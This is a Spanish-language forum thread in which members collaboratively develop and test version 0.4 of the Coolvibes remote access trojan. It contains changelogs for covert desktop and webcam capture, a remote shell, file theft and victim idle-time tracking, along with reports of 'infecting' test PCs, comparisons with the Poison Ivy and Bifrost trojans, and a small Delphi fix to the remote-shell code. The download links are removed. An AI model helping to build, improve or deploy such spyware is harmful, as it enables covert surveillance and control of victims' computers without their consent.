Antes de postear, por favor leer las reglas: http://www.indetectables.net/foro/viewtopic.php?t=569

Recopilación de versiones hasta el 01/02/07

Última Versión: Coolvibes 0.4 Update 4

[Enlace externo eliminado para invitados] ... .4-src.rar
[Enlace externo eliminado para invitados] ... e1-src.rar
[Enlace externo eliminado para invitados] ... e2-src.rar
[Enlace externo eliminado para invitados] ... e3-src.rar
[Enlace externo eliminado para invitados] ... e4-src.rar

Mirrors:
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]

-------------------------------------------------------------------------------

Hola, si creo que va a tener que ser una nueva versión, puesto que el server no es compatible con los clientes anteriores, por lo menos la parte de transferencia de archivos.

- En el explorador de archivos, al presionar la tecla ENTER sobre la barra de direcciones, va a esa ubicación (ya no es necesario presionar el botón "Ir/Actualizar"

Como ya comente se pueen realizar MÚLTIPLES descargas, pero solo se puede subir un archivo a la vez, puesto que no es una característica tan común como descargar archivos.
Fecha: 27/12/06
Versión: 0.4 Update 1
Modificación de: Unknown

[+] Se desabilitan el boton de Capturar escritorio mientras se está obteniendo una captura de escritorio
[+] Se desabilitan el boton de Capturar Webcam mientras se está obteniendo una captura de Webcam
[*] Se corrigió el bug que hacía que algunas capturas se paralizaran antes de ser completadas, para ello se modificó la rutina de transferencia de archivos

|----------------------------|
Fecha 25/12/2006
Versión: 0.4
Modificación de: Unknown
[+] Posibilidad de descargar múltiples archivos de forma simultánea
[+] Posibilidad de Detener una descarga en curso
[+] Posibilidad de Reanudar una descarga que ha sido detenida
[+] Posibilidad de colcar archivos en cola de descarga
[+] Al finalizar una descarga se inicializará automáticamente la primera descarga en cola
[+] Se pueden enviar comandos mientras se descarga una captura de escritorio o de web cam
[+] Posibilidad de detener la subida de un archivo
[+] Se agregó Tiempo de Inactividad a la información extendida del sistema
[*] En vez de usar Winsocks se usa el componente Indy, disponible automáticamente con la instalación de Delphi 6 en adelante
[*] Del lado del server se usa ClientSockets de Aphex para el envío y recepción de archivos, para el resto de los comandos se usa WinSock
Src + Bin Versión 0.4:
[Enlace externo eliminado para invitados]

Src + Bin Versión 0.4 Update 1:
[Enlace externo eliminado para invitados]

Saludos,
Unknown.
Última edición por Unknown el 27 Dic 2006, 17:15, editado 3 veces en total.
Una preguntica Unknown, que puerto usa el socket indepediente de la captura de pantalla? El mismo que el socket principal de los comandos o otro?
wack-a-mole escribió:Una preguntica Unknown, que puerto usa el socket indepediente de la captura de pantalla? El mismo que el socket principal de los comandos o otro?
Hola, TODOS los sockets independientes (transferencia de archivos, captura de pantalla y captura de web cam) usan el mismo puerto de los comandos.


Saludos,
Unknown.

Hasta ahora tengo LISTO lo siguiente:

- Posibilidad de Detener y REANUDAR!!! las descargas
- Posibilidad de múltiples descargas A LA VEZ!!!
- Posibilidad de colocar una descarga en cola y cuando alguna descarga en curso finalice, esta se comienza a decargar de forma AUTOMATICA!!!
- Ya hay un socket independiente para la captura de pantalla, así que cuando se pide una captura no hay que esperar que este finalice antes de poder usar las demás funcionalidades.
- En el explorador de archivos, al presionar la tecla ENTER sobre la barra de direcciones, va a esa ubicación (ya no es necesario presionar el botón "Ir/Actualizar"

Como ya coment´se pueen realizar MÚLTIPLES descargas, pero solo se puede subir un archivo a la vrz, puesto que no es una característica tqan común como descargar archivos
GENIAL! [/quote]
Unknown escribió:Hola, si creo que va a tener que ser una nueva versión, puesto que el server no es compatible con los clientes anteriores, por lo menos la parte de transferencia de archivos.

Hasta ahora tengo LISTO lo siguiente:

- Posibilidad de Detener y REANUDAR!!! las descargas
- Posibilidad de múltiples descargas A LA VEZ!!!
- Posibilidad de colocar una descarga en cola y cuando alguna descarga en curso finalice, esta se comienza a decargar de forma AUTOMATICA!!!
- Ya hay un socket independiente para la captura de pantalla, así que cuando se pide una captura no hay que esperar que este finalice antes de poder usar las demás funcionalidades.
- En el explorador de archivos, al presionar la tecla ENTER sobre la barra de direcciones, va a esa ubicación (ya no es necesario presionar el botón "Ir/Actualizar"

Como ya coment´se pueen realizar MÚLTIPLES descargas, pero solo se puede subir un archivo a la vrz, puesto que no es una característica tqan común como descargar archivos.

Falta:

- Socket independiente para la captura de la cámara web
- Agregar a la información del sistema: Tiempo de inactividad. Esto nos indicará cuanto tiempo lleva la persona sin ejecutar mover el mouse o realizar alguna acción de teclado.


Saludos,
Unknown.
Oh my God!

Un buen regalo de navidad, aunke llegara pasado las fechas, pero aun asi demasiado bueno! Suena genail todo

Hola, Bueno ya creo que he finalizado lo que prometí, a continuación les undico el link para que lo descarguen. Estoy seguro de que debe tener muchos bugs, así que espero sus comentarios para comenzar su corrección lo antes posible. Dado que las modificaciones realizadas hacen que el cliente y el servidor sean incompatibles con los anteriores, se le colocó una nueva versión (0.4).
En el archivo Historial.txt se indican las modificaciones.
Tambien les quería comentar que del lado del servidor ahora se usa el componente de sockets de Aphex para el manejo de transferencia de archivos, esto con la idea de que en un futuro se deje de usar ScktComp de Delphi, el componente de Aphex es MUCHO más liviano. Tambien se incluyó LomLib de Lom que incluye muchas funciones útiles, echenle un vistazo, a lo mejor en el futuro dejamos de usar muchas Units estándar de Delphi y así disminuimos el tamaño del server.

Link Descarga: Primer post de la página 1.

Saludos,
Unknown.
Última edición por Unknown el 26 Dic 2006, 14:00, editado 3 veces en total.
Oh si! Feliz Navidad

Probando con mi otra pc

Ya posteo los resultados, bugs y demas.

Muchas gracias

Updated 1:

Tengo una Lan

Las pcs las formatee hace 2 dias, infecte una de ellas y nada, ta bien configurado el router, puertos y demas.
En el poyson todo normal, las veo, en el cool nada >_<

Updated 2:
Infecte una pc q tenia en un antiguo bitfrost, y nada no aparece :/... intente con el viejo coolserver y normal O_O , ojala no sea solo a mi
A mí sí me conectó, pero lamento informar que los resultados son desatrosos

Lo primero, la shell quedó en absoluto Knock-Out. Al darle activar, se activa unos 20 segundos después, con la string "connected?" al final, lo que me hace pensar que cuando se maneja el Socket desde el thread independiente de la shell, esté no logra envíar datos hasta que el mismo socket envía otros datos desde el thread principal del programa (Pero no entiendo porqué, acabo de probarla en la 0.3 Update 4 y funciona de maravilla).

Después de activar la shell, ningún otro comando funciona. Todo lo que se reciba del servidor se va a la pantalla de la shell, como si se enviara al principio con 'SHELL|' y si cerramos la form de control se pierde la conexión con el cliente aunque el servidor sigue corriendo, y misteriosamente nunca más se vuelve a conectar (tuve que terminarlo manualmente).

En el explorador de archivos, al darle "encolar archivo" veo en la pestaña Transferencias que este queda en estado de espera, pero al darle "Inciar/Reanudar descarga" no sucede absolutamente nada. No cambia el estado, no se empieza a llenar la barra de progreso y desgraciadamente tampoco se transfiere el archivo. Lo único que cambia es que al volverle a dar click derecho nos sale "Detener descarga" (Que al hacerle click tampoco pasa nada). Pero si ya se ha iniciado una descarga, ésta si se puede parar y reanudar efectivamente También descargar varios archivos a la vez funciona.

"[+] Al finalizar una descarga se inicializará automáticamente la primera descarga en cola". Esto tampoco me funciona. No pasa nada cuando se termina la descarga anterior.

Bueno, espero que se pueda mejorar ésta versión.

Por otra parte quiero contarles que voy a estar ausente un par de semanas porque me voy de vacaciones. Espero que al volver todo vaya mucho mejor!
Hola, es muy extraño, todo lo que mencionan que no les funciona a mi me funciono, dejenme revisar y les aviso.

Saludos,
Unknown.
Ok, probe en otra máquina. Es cierto l de encolar archivos, lo revisaré.
Respecto a la shell, es cierta la parte del "connected?" sin embargo no me ocurre igual con lo que mencionas respecto a los demás comandos. Es decir, si activo la shell y luego ejecuto alguno de los demás comandos, el comando se ejecuta normalmente.
Igualmente, si cierro el form de control no pierdo la conexión con el servidor y al darle click nuevamente desde el main, esta se abre y ejecuta todos los comandos sin problemas.

Saludos,
Unknown.
Ya corregí el error de que las descargas encoladas no se iniciaban automáticamente cuando finalizaba una en curso. El error era tan tonto!!

Ahora voy con la Shell.

Saludos,
Unknown.
Felicidades Unknown muy buen trabajo !
Guau papa noel nos ha traido un buen regalo en forma de esta nueva versión.

Cuando finalizes le pongo las cosas que le puse a al 0.4 ;)
Hola, ya corregí también el error de la shell, el error era tan tonto como que me faltaba un enter tanto en el servidor como en el cliente.

link: Primer post de la página 1.

No le he puesto versión 0.4 revision XX porque esta aún no ha sido liberada como una versión definitiva, esto lo hace el administrador del foro, solo lo coloco para esto, probar y corregir errores antes de liberarlo.

Saludos y espero nuevamente sus comentarios,
Unknown.
Última edición por Unknown el 26 Dic 2006, 14:01, editado 2 veces en total.
Voy a revisarlo a ver qué tal y edito este post.

Gracias Unknown

Editado 1:
Encontré otro diminuto error en la visión de la shell y es que a veces se ven las cosas así:
C:\>
dirEl volumen [...]
y debería verse así:
C:\>
dir
El volumen [...]
Se corrige agregando Recibido := Recibido + #13#10; en la línea 635 de la UnitFormControl.pas, de modo que quede así:
Recibido := Recibido + #13#10;
while Length(Recibido) < StrToInt(TempStr) do
Recibido := Recibido + Athread.Connection.ReadLn + #13#10;
La cola de archivos ya funciona.

Lo otro es que hay que cambiar todos los títulos de las ventanas porque todavía dicen Coolvibes 0.3 Update 4 aunque esto se puede dejar para el final cuando vayamos a oficializar el update de Unknown (Aunque yo diría que está prácticamente listo).
Hola, cierto, no me había fijado en lo de los títulos con la ersión 0.3. Ya corregiré de la shell, como es un problema tan pequeño, esperaré a que alguien encuentre algo más grande para publicar nuevamente.

Ah por cierto, me gustaría que alguien se encargara de agregar los iconos a los menus con las nuevas opciones que he agregado, no soy muy bueno en eso de encontrar íconos adecuados.

Saludos,
Unknown.

Volver a “Desarrollo CoolvibesRAT”